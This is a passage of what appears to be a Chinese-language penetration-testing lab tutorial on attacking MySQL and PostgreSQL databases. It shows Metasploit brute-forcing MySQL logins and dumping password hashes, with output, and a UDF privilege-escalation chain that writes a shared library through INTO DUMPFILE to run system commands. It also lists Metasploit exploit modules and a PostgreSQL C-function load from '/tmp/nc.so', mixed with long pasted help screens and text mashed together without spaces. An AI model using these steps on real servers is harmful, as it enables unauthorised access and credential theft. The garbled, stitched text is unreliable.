select 0xnnnnnn… INTO DUMPFILE ‘/path/to/filename’
将数据写入二进制文件.
####怎样安装mysql数据库服务器 ?####
Lab: ubuntu / debian
1 2
$ sudo apt-get install mysql-server $ sudo systemctl start service
编辑 /etc/mysql/mysql.conf.d/mysqld.cnf, 和改变 绑定的地址.
1
bind-address = 0.0.0.0
####允许远程访问####
1 2 3 4 5
root@sh:~# ss -ant | grep ":3306" LISTEN 080 *:3306 *:* root@sh:~# mysql -h 10.0.250.71 -uroot -p Enter password: ERROR 1130 (HY000): Host '10.0.250.71'isnot allowed to connect tothis MySQL server
创建一个SQL文件 adduser.sql, 和执行这个命令: mysql -h 127.0.0.1 -u root -p mysql < adduser.sql
1 2 3 4
CREATEUSER'mysqlsec'@'localhost'IDENTIFIEDBY'password'; GRANT ALL PRIVILEGESON *.* TO'mysqlsec'@'localhost'WITHGRANTOPTION; CREATEUSER'mysqlsec'@'%'IDENTIFIEDBY'password'; GRANT ALL PRIVILEGESON *.* TO'mysqlsec'@'%'WITHGRANTOPTION;
root@sh:~# mysql -h 10.0.250.71 -u mysqlsec -p mysql Enter password: Reading table information for completion of table and column names You can turn off this feature toget a quicker startup with -A
Welcome tothe MySQL monitor. Commands endwith ; or \g. Your MySQL connection idis8 Server version: 5.6.30-1 (Debian)
Copyright (c) 2000, 2016, Oracle and/orits affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/orits affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords forall users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0to5 DB_ALL_CREDS false no Try each user/password couple stored in the current database DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE /tmp/pass.txt no File containing passwords, one per line Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 10.0.250.71 yes The target address rangeor CIDR identifier RPORT 3306 yes The target port STOP_ON_SUCCESS true yes Stop guessing when a credential works fora host THREADS 10 yes The number of concurrent threads USERNAME mysqlsec no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password forall users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether toprint output forall attempts
msf auxiliary(mysql_login) > run
[*] 10.0.250.71:3306 - 10.0.250.71:3306 - Found remote MySQL version5.6.30 [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:AzVJmX (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:j1Uyj3 (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:root (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) [-] 10.0.250.71:3306 - 10.0.250.71:3306 - LOGIN FAILED: mysqlsec:mysql (Incorrect: Access denied for user 'mysqlsec'@'10.0.250.67' (using password: YES)) [+] 10.0.250.71:3306 - MYSQL - Success:'mysqlsec:password' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD password no The password for the specified username RHOSTS 10.0.250.71 yes The target address range or CIDR identifier RPORT 3306 yes The target port THREADS 1 yes The number of concurrent threads USERNAME mysqlsec no The username to authenticate as
msf auxiliary(mysql_hashdump) > run
[+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.0.250.71:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.0.250.71:3306 - Saving HashString as Loot: debian-sys-maint:*8E970943FBFAA7CF6A11A55677E8050B725D9919 [+] 10.0.250.71:3306 - Saving HashString as Loot: phpmyadmin:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.0.250.71:3306 - Saving HashString as Loot: freepbxuser:*433D16EECA646A6CCF8F024AD8CDDC070C6791C1 [+] 10.0.250.71:3306 - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [+] 10.0.250.71:3306 - Saving HashString as Loot: mysqlsec:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
typedefstructst_udf_args { unsignedint arg_count; // number of arguments enum Item_result *arg_type; // pointer to item_result char **args; // pointer to arguments unsignedlong *lengths; // length of string args char *maybe_null; // 1 for maybe_null args } UDF_ARGS;
typedefstructst_udf_init { char maybe_null; // 1 if func can return NULL unsignedint decimals; // for real functions unsignedlong max_length; // for string functions char *ptr; // free ptr for func data char const_item; // 0 if result is constant } UDF_INIT;
# How to upload UDF DLL into mysql server ? # show VARIABLES; # select @@plugin_dir; # SELECT CHAR (...) INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' # SELECT 0xnnnnn INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' # drop functionif exists do_system # create function do_system returns integer soname 'lib_mysqludf_sys.so'; # select sys_exec('id');
def convert(filename): with open(filename) as f: print(binascii.hexlify(f.read()))
if __name__ == '__main__': if len(sys.argv) != 2: print("python {} /path/to/lib_mysqludf_sys.so".format(sys.argv[0])) else: convert(sys.argv[1])
上传该文件, 并用mysql用户定义一个函数 do_system.
1 2 3 4 5 6
mysql > select @@plugin_dir; mysql > SELECT0x7f45........0000INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so' mysql > dropfunctionifexists do_system mysql > createfunction do_system returns integer soname 'lib_mysqludf_sys.so'; mysql > select do_system('id > /tmp/result.log'); mysql > select load_file('/tmp/result.log');
####MOF权限提升####
如果mysql部署在windows上,可以尝试用msf:
1 2 3 4 5 6
msf > use exploit/windows/mysql/mysql_mof use exploit/windows/mysql/mysql_start_up use exploit/windows/mysql/scrutinizer_upload_exec use exploit/windows/mysql/mysql_payload use exploit/windows/mysql/mysql_yassl_hello
postgres=# help You are using psql, the command-line interface to PostgreSQL. Type: \copyright for distribution terms \h for help with SQL commands \? for help with psql commands \g or terminate with semicolon to execute query \q to quit
postgres=# \h Available help: ABORT CREATE FOREIGN DATA WRAPPER DROP SEQUENCE ALTER AGGREGATE CREATE FOREIGN TABLE DROP SERVER ALTER COLLATION CREATEFUNCTIONDROP TABLE ALTER CONVERSION CREATEGROUPDROP TABLESPACE ALTERDATABASECREATEINDEXDROP TEXT SEARCH CONFIGURATION ALTER DEFAULT PRIVILEGES CREATE LANGUAGE DROP TEXT SEARCH DICTIONARY ALTER DOMAIN CREATEMATERIALIZEDVIEWDROP TEXT SEARCH PARSER ALTER EVENT TRIGGERCREATE OPERATOR DROP TEXT SEARCH TEMPLATE ALTER EXTENSION CREATE OPERATOR CLASS DROPTRIGGER ALTER FOREIGN DATA WRAPPER CREATE OPERATOR FAMILY DROPTYPE ALTER FOREIGN TABLE CREATEROLEDROPUSER ALTERFUNCTIONCREATE RULE DROPUSERMAPPING ALTERGROUPCREATESCHEMADROPVIEW ALTERINDEXCREATE SEQUENCE END ALTER LANGUAGE CREATE SERVER EXECUTE ALTER LARGE OBJECTCREATE TABLE EXPLAIN ALTERMATERIALIZEDVIEWCREATE TABLE ASFETCH ALTER OPERATOR CREATE TABLESPACE GRANT ALTER OPERATOR CLASS CREATE TEXT SEARCH CONFIGURATION INSERT ALTER OPERATOR FAMILY CREATE TEXT SEARCH DICTIONARY LISTEN ALTERROLECREATE TEXT SEARCH PARSER LOAD ALTER RULE CREATE TEXT SEARCH TEMPLATE LOCK ALTERSCHEMACREATETRIGGER MOVE ALTER SEQUENCE CREATETYPE NOTIFY ALTER SERVER CREATEUSERPREPARE ALTERSYSTEMCREATEUSERMAPPINGPREPARETRANSACTION ALTER TABLE CREATEVIEW REASSIGN OWNED ALTER TABLESPACE DEALLOCATE REFRESH MATERIALIZEDVIEW ALTER TEXT SEARCH CONFIGURATION DECLARE REINDEX ALTER TEXT SEARCH DICTIONARY DELETE RELEASE SAVEPOINT ALTER TEXT SEARCH PARSER DISCARD RESET ALTER TEXT SEARCH TEMPLATE DOREVOKE ALTERTRIGGERDROP AGGREGATE ROLLBACK ALTERTYPEDROPCASTROLLBACK PREPARED ALTERUSERDROP COLLATION ROLLBACKTO SAVEPOINT ALTERUSERMAPPINGDROP CONVERSION SAVEPOINT ALTERVIEWDROPDATABASE SECURITY LABEL ANALYZEDROP DOMAIN SELECT BEGINDROP EVENT TRIGGERSELECTINTO CHECKPOINT DROP EXTENSION SET CLOSE DROP FOREIGN DATA WRAPPER SET CONSTRAINTS CLUSTERDROP FOREIGN TABLE SETROLE COMMENT DROPFUNCTIONSET SESSION AUTHORIZATION COMMITDROPGROUPSETTRANSACTION COMMIT PREPARED DROPINDEXSHOW COPY DROP LANGUAGE STARTTRANSACTION CREATE AGGREGATE DROPMATERIALIZEDVIEW TABLE CREATECASTDROP OPERATOR TRUNCATE CREATE COLLATION DROP OPERATOR CLASS UNLISTEN CREATE CONVERSION DROP OPERATOR FAMILY UPDATE CREATEDATABASEDROP OWNED VACUUM CREATE DOMAIN DROPROLEVALUES CREATE EVENT TRIGGERDROP RULE WITH CREATE EXTENSION DROPSCHEMA
postgres=# \? General \copyright show PostgreSQL usage and distribution terms \g [FILE] or ; execute query (and send results to file or |pipe) \gset [PREFIX] execute query and store results in psql variables \h [NAME] helponsyntax of SQL commands, * for all commands \q quit psql \watch [SEC] execute query every SEC seconds
Query Buffer \e [FILE] [LINE] edit the query buffer (or file) with external editor \ef [FUNCNAME [LINE]] edit function definition with external editor \p show the contents of the query buffer \r reset (clear) the query buffer \s [FILE] display history or save it to file \w FILE write query buffer to file
Input/Output \copy ... perform SQL COPY with data stream to the client host \echo [STRING] write string to standard output \i FILE execute commands from file \irFILEas \i, but relative to location of current script \o [FILE] send all query results to file or |pipe \qecho [STRING] write string to query output stream (see \o)
Informational (options: S = show system objects, + = additional detail) \d[S+] list tables, views, and sequences \d[S+] NAME describetable, view, sequence, or index \da[S] [PATTERN] list aggregates \db[+] [PATTERN] list tablespaces \dc[S+] [PATTERN] list conversions \dC[+] [PATTERN] list casts \dd[S] [PATTERN] show object descriptions not displayed elsewhere \ddp [PATTERN] list default privileges \dD[S+] [PATTERN] list domains \det[+] [PATTERN] list foreign tables \des[+] [PATTERN] list foreign servers \deu[+] [PATTERN] list user mappings \dew[+] [PATTERN] list foreign-data wrappers \df[antw][S+] [PATRN] list [only agg/normal/trigger/window] functions \dF[+] [PATTERN] list text search configurations \dFd[+] [PATTERN] list text search dictionaries \dFp[+] [PATTERN] list text search parsers \dFt[+] [PATTERN] list text search templates \dg[+] [PATTERN] list roles \di[S+] [PATTERN] list indexes \dl list large objects, same as \lo_list \dL[S+] [PATTERN] list procedural languages \dm[S+] [PATTERN] list materialized views \dn[S+] [PATTERN] list schemas \do[S] [PATTERN] list operators \dO[S+] [PATTERN] list collations \dp [PATTERN] listtable, view, and sequence access privileges \drds [PATRN1 [PATRN2]] list per-database role settings \ds[S+] [PATTERN] list sequences \dt[S+] [PATTERN] list tables \dT[S+] [PATTERN] list data types \du[+] [PATTERN] list roles \dv[S+] [PATTERN] list views \dE[S+] [PATTERN] list foreign tables \dx[+] [PATTERN] list extensions \dy [PATTERN] list event triggers \l[+] [PATTERN] list databases \sf[+] FUNCNAME show a function's definition \z [PATTERN] same as \dp
Formatting \a toggle between unaligned and aligned output mode \C [STRING] settable title, or unset if none \f [STRING] show or set field separator for unaligned query output \H toggle HTML output mode (currently off) \pset [NAME [VALUE]] settable output option (NAME := {format|border|expanded|fieldsep|fieldsep_zero|footer|null| numericlocale|recordsep|recordsep_zero|tuples_only|title|tableattr|pager}) \t [on|off] show only rows (currently off) \T [STRING] set HTML <table> tag attributes, or unset if none \x [on|off|auto] toggle expanded output (currently off)
Connection \c[onnect] {[DBNAME|- USER|- HOST|- PORT|-] | conninfo} connect to new database (currently "postgres") \encoding [ENCODING] show or set client encoding \password [USERNAME] securely change the password for a user \conninfo display information about current connection
Operating System \cd [DIR] change the current working directory \setenv NAME [VALUE] set or unset environment variable \timing [on|off] toggle timing of commands (currently off) \! [COMMAND] execute command inshell or start interactive shell
Variables \prompt [TEXT] NAME prompt user to set internal variable \set [NAME [VALUE]] set internal variable, or list all ifno parameters \unset NAME unset (delete) internal variable
Large Objects \lo_export LOBOID FILE \lo_import FILE [COMMENT] \lo_list \lo_unlink LOBOID large object operations
postgres=# \du List of roles Role name | Attributes | Member of -----------+------------------------------------------------+----------- msfuser | | {} postgres | Superuser, Create role, Create DB, Replication | {}
Please try more details about postgresql database.
postgres=# SELECT lo_export(19074, 'cmd.so'); ERROR: pg_largeobject entry for OID 19074, page 0has invalid data field size 3213 postgres=# SELECT setting FROM pg_settings WHERE name='data_directory'; setting ------------------------ /var/lib/postgres/data (1 row)
postgres=# CREATE ORREPLACEFUNCTION exec() RETURNS text AS '/tmp/nc.so', 'exec' LANGUAGE C STRICT; CREATE FUNCTION postgres=# SELECT exec(); server closed the connection unexpectedly This probably means the server terminated abnormally before orwhile processing the request. The connection to the server was lost. Attempting reset: Failed.
####METASPLOIT POSTGRESQL模块####
1 2 3 4 5 6 7 8
use auxiliary/admin/postgres/postgres_readfile use auxiliary/admin/postgres/postgres_sql use auxiliary/scanner/postgres/postgres_dbname_flag_injection use auxiliary/scanner/postgres/postgres_login use auxiliary/scanner/postgres/postgres_version use auxiliary/server/capture/postgresql use exploit/linux/postgres/postgres_payload use exploit/windows/postgres/postgres_payload
┌─[lab@core]─[~/share/pentestlab/Darknet] └──╼ sqlite3 temp.db SQLite version 3.8.10.2 2015-05-20 18:17:19 Enter ".help"for usage hints. sqlite> .help .backup ?DB? FILE Backup DB (default "main") to FILE .bail on|off Stop after hitting anerror. Default OFF .binary on|off Turn binary output on or off. Default OFF .clone NEWDB Clone data into NEWDB from the existing database .databases List names and files of attached databases .dbinfo ?DB? Show status information about the database .dump ?TABLE? ... Dump the database inan SQL text format IfTABLE specified, only dump tables matching LIKE pattern TABLE. .echo on|off Turn command echo on or off .eqp on|off Enable or disable automatic EXPLAIN QUERY PLAN .exitExit this program .explain ?on|off? Turn output mode suitable for EXPLAIN on or off. With noargs, it turns EXPLAIN on. .fullschema Show schema and the content of sqlite_stat tables .headers on|off Turn display of headers on or off .help Show this message .import FILETABLE Import data from FILE into TABLE .indexes ?TABLE? Show names of all indexes IfTABLE specified, only show indexes for tables matching LIKE pattern TABLE. .limit ?LIMIT? ?VAL? Display or change the value of an SQLITE_LIMIT .load FILE ?ENTRY? Load an extension library .logFILE|off Turn logging on or off. FILE can be stderr/stdout .mode MODE ?TABLE? Set output mode where MODE is one of: ascii Columns/rows delimited by 0x1F and 0x1E csv Comma-separated values column Left-aligned columns. (See .width) html HTML <table> code insert SQL insert statements forTABLE lineOne value per line list Values delimited by .separator strings tabs Tab-separated values tcl TCL list elements .nullvalue STRING Use STRING in place of NULL values .once FILENAME Output for the next SQL command only to FILENAME .open ?FILENAME? Close existing database and reopen FILENAME .output ?FILENAME? Send output to FILENAME or stdout .print STRING... Print literal STRING .prompt MAIN CONTINUEReplace the standard prompts .quit Exit this program .read FILENAME Execute SQL in FILENAME .restore ?DB? FILERestore content of DB (default "main") from FILE .saveFILE Write in-memory database into FILE .scanstats on|off Turn sqlite3_stmt_scanstatus() metrics on or off .schema ?TABLE? Show the CREATE statements IfTABLE specified, only show tables matching LIKE pattern TABLE. .separator COL ?ROW? Change the column separator and optionally the row separator for both the output mode and .import .shell CMD ARGS... Run CMD ARGS... in a system shell .show Show the current values for various settings .stats on|off Turn stats on or off .system CMD ARGS... Run CMD ARGS... in a system shell .tables ?TABLE? List names of tables IfTABLE specified, only list tables matching LIKE pattern TABLE. .timeout MS Try opening locked tables for MS milliseconds .timeron|off Turn SQL timeron or off .trace FILE|off Output each SQL statement as it is run .vfsname ?AUX? Print the name of the VFS stack .width NUM1 NUM2 ... Set column widths for"column" mode Negative values right-justify
